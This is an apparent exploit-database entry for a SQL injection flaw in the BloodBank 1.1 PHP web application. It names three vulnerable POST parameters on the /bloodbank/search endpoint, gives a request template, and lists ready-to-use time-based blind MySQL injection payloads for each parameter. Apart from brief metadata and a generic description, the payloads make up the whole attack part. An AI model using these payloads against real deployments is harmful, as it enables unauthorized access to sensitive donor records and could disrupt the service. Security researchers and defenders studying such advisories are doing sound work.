Share
## https://sploitus.com/exploit?id=PACKETSTORM:173539
# Exploit Title: BloodBank 1.1 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 15/07/2023  
# Vendor: phpscriptpoint  
# Vendor Homepage: https://phpscriptpoint.com/  
# Software Link: https://demo.phpscriptpoint.com/bloodbank/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
  
Path: /bloodbank/search  
  
POST parameter 'country' is vulnerable to SQL Injection  
POST parameter 'city' is vulnerable to SQL Injection  
POST parameter 'blood_group_id' is vulnerable to SQL Injection  
  
  
-----------------------------------------------------------  
POST /bloodbank/search HTTP/2  
  
country=[SQLI]&city=[SQLI]&blood_group_id=[SQLI]&form_search=Search+Donor  
-----------------------------------------------------------  
  
  
---  
Parameter: country (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: country=123'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&city=123&blood_group_id=2&form_search=Search+Donor  
  
Parameter: city (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: country=123&city=123'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&blood_group_id=2&form_search=Search+Donor  
  
Parameter: blood_group_id (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: country=123&city=123&blood_group_id=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&form_search=Search+Donor  
---  
  
  
  
[-] Done